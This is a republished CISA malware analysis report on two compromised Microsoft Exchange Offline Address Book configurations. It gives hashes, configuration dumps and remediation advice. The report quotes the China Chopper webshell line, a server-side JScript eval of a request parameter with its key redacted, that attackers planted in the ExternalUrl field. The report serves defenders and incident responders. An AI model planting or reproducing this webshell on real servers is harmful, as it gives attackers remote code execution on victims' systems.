This article is contributed. See the original author and article here.

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

CISA received two unique files for analysis. These files appear to contain configuration data for two different Microsoft Exchange Offline Address Book (OAB) Virtual Directories (VD) extracted from a single Microsoft Exchange Server. Both output files show malicious modifications for the ExternalUrl parameters for these two OAB VDs on the targeted Exchange Servers. In one of the OAB VDs, the ExternalUrl parameter contains a “China Chopper” webshell which may permit a remote operator to dynamically execute JavaScript code on the compromised Microsoft Exchange Server.

For a downloadable copy of IOCs, see: MAR-10328877-1.v1.stix.

Submitted Files (2)

71ff78f43c60a61566dac1a923557670e5e832c4adfe5efb91cac7d8386b70e0 (zXkZu6bn.aspx)

ee883200fb1c58d22e6c642808d651103ae09c1cea270ab0dc4ed7761cb87368 (shell.aspx)

Findings

71ff78f43c60a61566dac1a923557670e5e832c4adfe5efb91cac7d8386b70e0

Tags

backdoor

Details
Name zXkZu6bn.aspx
Size 2287 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 3e9201b5021dccd29ada4b74e79f2790
SHA1 32f7b3cdbf1e8670cc2725107313fc7c6a90ad94
SHA256 71ff78f43c60a61566dac1a923557670e5e832c4adfe5efb91cac7d8386b70e0
SHA512 8a1cf70640ef649ba06db5d1d65f436e5f8d339bd0622a30b026c6c3af9092e1c44be5c2a943d8adb1a122df678ddf258aa05d922ee856e94bd383300fd89453
ssdeep 24:kk3S0rdj0r+rJTh91Q/PSLOy68U6SzMaEVMr68UB1idfhGhksXi2E4ONF0qlHyK+:kkC0rdH1Bzs6KIPQZGhkok4ONF0qlH3+
Entropy 4.584842
Antivirus
Microsoft Security Essentials Backdoor:ASP/Chopper.F!dha
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is an OAB configuration file. Analysis indicates this file contains log data collected from an OAB configured on a compromised Microsoft Exchange Server. The Exchange OAB VD is utilized to access Microsoft Exchange address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a “China Chopper” webshell which is likely an attempt to gain unauthorized access for dynamic remote code execution against a targeted Microsoft Exchange Server. In this file, the OAB ExternalUrl parameter was configured to accept JavaScript code which will directly be executed on the target system. The modification of the ExternalUrl parameter suggests the operator can dynamically submit queries to this Exchange OAB VD containing JavaScript code that will be executed on the target system.

In this file, the ExternalUrl designation that normally specifies the Uniform Resource Locator (URL) used to connect to the VD from outside the firewall has been replaced with the following code:

–Begin Code–
hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
–End Code–

Note: The hard-coded key used for authentication was redacted from the code above.

This file contains the following configuration data (sensitive data was redacted):

–Begin Configuration For Compromised OAB VD–
Name                            : OAB (Default Web Site)
PollInterval                    : 240
OfflineAddressBooks             : Default Offline Address Book (Ex2013)
RequireSSL                     : True
BasicAuthentication             : False
WindowsAuthentication         : True
OAuthAuthentication             : True
MetabasePath                    : IIS://ITEX2.REDACTED.local/W3SVC/1/ROOT/OAB
Path                            : C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyOAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         :
ExtendedProtectionSPNList     :
AdminDisplayVersion             : Version 15.1 (Build 2044.4)
Server                         : ITEX2
InternalUrl                     : hxxps[:]//mail.REDACTED.gov/oab
InternalAuthenticationMethods : OAuth
                                WindowsIntegrated
ExternalUrl                     : hxxp[:]//f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“[REDACTED]”],”unsafe”);}</script>
ExternalAuthenticationMethods : OAuth
                                WindowsIntegrated
AdminDisplayName                :
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=ITEX2,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=bcex,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=bc,DC=local
Identity                        : ITEX2OAB (Default Web Site)
Guid                            : bf58512e-c24e-41b3-b03c-074cdb76fc1b
ObjectCategory                 : bc.local/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                msExchVirtualDirectory
                                msExchOABVirtualDirectory
WhenChanged                     : 3/1/2021 8:50:04 AM
WhenCreated                     : 2/21/2019 5:53:27 PM
WhenChangedUTC                 : 3/1/2021 2:50:04 PM
WhenCreatedUTC                 : 2/21/2019 11:53:27 PM
OrganizationId                 :
Id                             : ITEX2OAB (Default Web Site)
OriginatingServer             : ITDC4.REDACTED.local
IsValid                         : True
–End Configuration For Compromised OAB VD–

ee883200fb1c58d22e6c642808d651103ae09c1cea270ab0dc4ed7761cb87368

Tags

backdoor

Details
Name shell.aspx
Size 2292 bytes
Type ASCII text, with CRLF line terminators
MD5 81a94d49a40cbb980b33c9365e9c102f
SHA1 eaae8f25c1062b7d61a6e1a0a2e3d0e3bb9cc7d0
SHA256 ee883200fb1c58d22e6c642808d651103ae09c1cea270ab0dc4ed7761cb87368
SHA512 687561052e3d6218da275c1cd36cd835956acce0fb5c146250cf795547e35b4297745dcd2b7c2abc4051db06de9f73465c34036ec7d9c675b102e6d7b7fe10a7
ssdeep 24:kNrde90r+rJTh91Q/PSD56jfr6j71idfhGhkdinli2E4ONF0qArjI:kNrdel1B6k5QZGhkdak4ONF0q1
Entropy 4.478308
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is an OAB configuration file. Analysis indicates this file contains log data collected from an OAB configured on a compromised system. The Exchange OAB VD is utilized to access Microsoft Exchange address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a “China Chopper” webshell, which is likely an attempt to gain unauthorized access for dynamic remote code execution against a targeted Microsoft Exchange Server.

In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

–Begin Code–
hxxp[:]//a/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB
–End Code–

This file contains the following configuration data (sensitive data was redacted):

–Begin Configuration For Compromised OAB VD–
Name                            : OAB (Default Web Site)
PollInterval                    : 480
OfflineAddressBooks             :
RequireSSL                     : True
BasicAuthentication             : False
WindowsAuthentication         : True
OAuthAuthentication             : False
MetabasePath                    : IIS://ITEX2.REDACTED.local/W3SVC/1/ROOT/OAB
Path                            : C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyOAB
ExtendedProtectionTokenChecking : None
ExtendedProtectionFlags         :
ExtendedProtectionSPNList     :
AdminDisplayVersion             : Version 15.1 (Build 2044.4)
Server                         : ITEX2
InternalUrl                     : hxxps[:]//itex2.REDACTED.local/OAB
InternalAuthenticationMethods : WindowsIntegrated
ExternalUrl                     : hxxp[:]//a/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB
ExternalAuthenticationMethods : WindowsIntegrated
AdminDisplayName                :
ExchangeVersion                 : 0.10 (14.0.100.0)
DistinguishedName             : CN=OAB (Default Web Site),CN=HTTP,CN=Protocols,CN=ITEX2,CN=Servers,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=bcex,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=bc,DC=local
Identity                        : ITEX2OAB (Default Web Site)
Guid                            : 345506a1-c27f-4604-9dd4-f7ec7aedf4af
ObjectCategory                 : bc.local/Configuration/Schema/ms-Exch-OAB-Virtual-Directory
ObjectClass                     : top
                                msExchVirtualDirectory
                                msExchOABVirtualDirectory
WhenChanged                     : 3/2/2021 6:24:59 AM
WhenCreated                     : 3/1/2021 8:50:15 AM
WhenChangedUTC                 : 3/2/2021 12:24:59 PM
WhenCreatedUTC                 : 3/1/2021 2:50:15 PM
OrganizationId                 :
Id                             : ITEX2OAB (Default Web Site)
OriginatingServer             : ITDC4.REDACTED.local
IsValid                         : True
–End Configuration For Compromised OAB VD–

Mitigation

If you find these webshells as you are examining your system for Microsoft Exchange Vulnerabilities, please visit the https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities website for further information on remediation.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.